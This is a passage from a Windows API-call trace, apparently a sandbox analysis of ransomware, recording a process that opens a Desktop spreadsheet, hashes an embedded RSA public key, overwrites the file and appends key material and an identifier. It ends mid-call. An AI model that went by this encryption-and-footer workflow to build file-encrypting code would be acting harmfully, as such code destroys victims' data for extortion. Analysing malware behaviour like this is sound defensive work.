ftLastAccessTime.dwLowDateTime=0xcc646fa0, ftLastAccessTime.dwHighDateTime=0x1d5d882, ftLastWriteTime.dwLowDateTime=0xcc646fa0, ftLastWriteTime.dwHighDateTime=0x1d5d882, nFileSizeHigh=0x0, nFileSizeLow=0x11ddf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8oQepxUnCyEAzbeX.ods", cAlternateFileName="8OQEPX~1.ODS")) returned 1 [0130.299] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.299] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.299] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8oQepxUnCyEAzbeX.ods") returned=".ods" [0130.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8oQepxUnCyEAzbeX.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8oqepxuncyeazbex.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.299] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=73183) returned 1 [0130.299] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.302] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x11db9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.302] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.303] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.303] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x11ddf, lpOverlapped=0x0) returned 1 [0130.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.304] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.304] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.305] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.305] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.305] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.305] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.305] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.305] GetLastError () returned 0x0 [0130.305] SetLastError (dwErrCode=0x0) [0130.305] GetLastError () returned 0x0 [0130.305] SetLastError (dwErrCode=0x0) [0130.305] GetLastError () returned 0x0 [0130.305] SetLastError (dwErrCode=0x0) [0130.305] GetLastError () returned 0x0 [0130.306] SetLastError (dwErrCode=0x0) [0130.306] GetLastError () returned 0x0 [0130.306] SetLastError (dwErrCode=0x0) [0130.306] GetLastError () returned 0x0 [0130.306] SetLastError (dwErrCode=0x0) [0130.306] GetLastError () returned 0x0 [0130.306] SetLastError (dwErrCode=0x0) [0130.306] GetLastError () returned 0x0 [0130.306] SetLastError (dwErrCode=0x0) [0130.306] GetLastError () returned 0x0 [0130.306] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.306] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.306] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.306] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.306] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.306] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.306] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.306] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.306] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11de0) returned 0xdd2c688 [0130.307] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.307] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2740 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a88 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2c50 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ae8 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b18 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b30 [0130.307] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdcfae58 [0130.308] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b18 | out: hHeap=0x4970000) returned 1 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b30 | out: hHeap=0x4970000) returned 1 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b30 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16b18 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0130.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b30 | out: hHeap=0x4970000) returned 1 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b18 | out: hHeap=0x4970000) returned 1 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.308] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.309] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.309] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.309] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.309] GetCurrentThreadId () returned 0x618 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d56b0 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.309] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.309] GetCurrentThreadId () returned 0x618 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.309] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.309] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.309] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.309] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.309] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.309] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.310] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b18 [0130.310] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0130.310] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b30 [0130.310] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.310] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b00 [0130.310] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.310] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.310] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.310] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.310] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b48 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b18 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b18 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b18 | out: hHeap=0x4970000) returned 1 [0130.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.312] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b48 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b30 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b00 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c5028 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ae8 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2c50 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.312] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.313] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.313] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.313] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.313] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.313] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.313] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.313] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd2c688*, nNumberOfBytesToWrite=0x11dda, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd2c688*, lpNumberOfBytesWritten=0xe00fb14*=0x11dda, lpOverlapped=0x0) returned 1 [0130.313] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0130.313] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x11ddf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.313] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.313] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.313] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.314] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.314] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.314] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.314] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.314] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: 